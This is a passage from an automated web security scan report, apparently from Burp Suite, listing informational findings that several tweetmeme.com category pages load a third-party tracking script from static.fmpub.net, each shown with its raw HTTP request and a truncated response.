HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:30:52 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0038409233093262
X-Served-In: 0.04440712928772
X-Served-By: h01
Content-Length: 54409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Bas
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.390. http://tweetmeme.com/category/sports-extreme

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/sports-extreme

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/sports-extreme HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:31:05 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0092470645904541
X-Served-In: 0.58585095405579
X-Served-By: ded2062
Content-Length: 36970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Ext
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.391. http://tweetmeme.com/category/sports-golf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/sports-golf

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/sports-golf HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:31:07 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0043578147888184
X-Served-In: 0.054213047027588
X-Served-By: ded2060
Content-Length: 56103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Gol
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.392. http://tweetmeme.com/category/sports-hockey

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/sports-hockey

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/sports-hockey HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:31:16 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0033860206604004
X-Served-In: 1.6830840110779
X-Served-By: h03
Content-Length: 56885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Hoc
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.393. http://tweetmeme.com/category/sports-motorsports

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/sports-motorsports

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/sports-motorsports HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:31:36 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0045862197875977
X-Served-In: 0.44986295700073
X-Served-By: ded2059
Content-Length: 54144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Mot
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.394. http://tweetmeme.com/category/sports-olympics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/sports-olympics

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/sports-olympics HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:31:42 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0048768520355225
X-Served-In: 0.42826700210571
X-Served-By: h03
Content-Length: 52629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Oly
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.395. http://tweetmeme.com/category/sports-soccer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/sports-soccer

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/sports-soccer HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:31:53 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0034091472625732
X-Served-In: 0.051372051239014
X-Served-By: h00
Content-Length: 55638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Soc
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.396. http://tweetmeme.com/category/sports-tennis

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/sports-tennis

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/sports-tennis HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:32:09 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0033609867095947
X-Served-In: 0.5688591003418
X-Served-By: ded2059
Content-Length: 45901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Ten
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.397. http://tweetmeme.com/category/technology

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/technology

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/technology HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:32:51 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0069949626922607
X-Served-In: 0.058082103729248
X-Served-By: ded2059
Content-Length: 55939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Tec
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.398. http://tweetmeme.com/category/technology-apple

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/technology-apple

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/technology-apple HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:33:50 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.004241943359375
X-Served-In: 0.061571836471558
X-Served-By: h04
Content-Length: 55432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
App
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.399. http://tweetmeme.com/category/technology-design

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/technology-design

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/technology-design HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:33:53 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0040419101715088
X-Served-In: 0.041590213775635
X-Served-By: ded2062
Content-Length: 52678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Des
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.400. http://tweetmeme.com/category/technology-gadgets

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/technology-gadgets

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/technology-gadgets HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:34:14 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0037078857421875
X-Served-In: 0.055214881896973
X-Served-By: ded2061
Content-Length: 55793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Gad
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.401. http://tweetmeme.com/category/technology-hardware

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/technology-hardware

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/technology-hardware HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:34:48 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0034070014953613
X-Served-In: 0.045053005218506
X-Served-By: h02
Content-Length: 57584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Har
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.402. http://tweetmeme.com/category/technology-linuxunix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/technology-linuxunix

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/technology-linuxunix HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:35:00 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0034079551696777
X-Served-In: 0.044731140136719
X-Served-By: ded2062
Content-Length: 55757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Lin
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.403. http://tweetmeme.com/category/technology-microsoft

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/technology-microsoft

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/technology-microsoft HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:35:12 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0052421092987061
X-Served-In: 0.050689220428467
X-Served-By: h01
Content-Length: 57472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Mic
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.404. http://tweetmeme.com/category/technology-programming

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/technology-programming

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/technology-programming HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:35:25 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0046720504760742
X-Served-In: 1.6501049995422
X-Served-By: h00
Content-Length: 54400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Pro
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.405. http://tweetmeme.com/category/technology-security

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/technology-security

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/technology-security HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:36:01 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0038430690765381
X-Served-In: 0.052386045455933
X-Served-By: h03
Content-Length: 52607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Sec
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.406. http://tweetmeme.com/category/technology-software

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/technology-software

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/technology-software HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
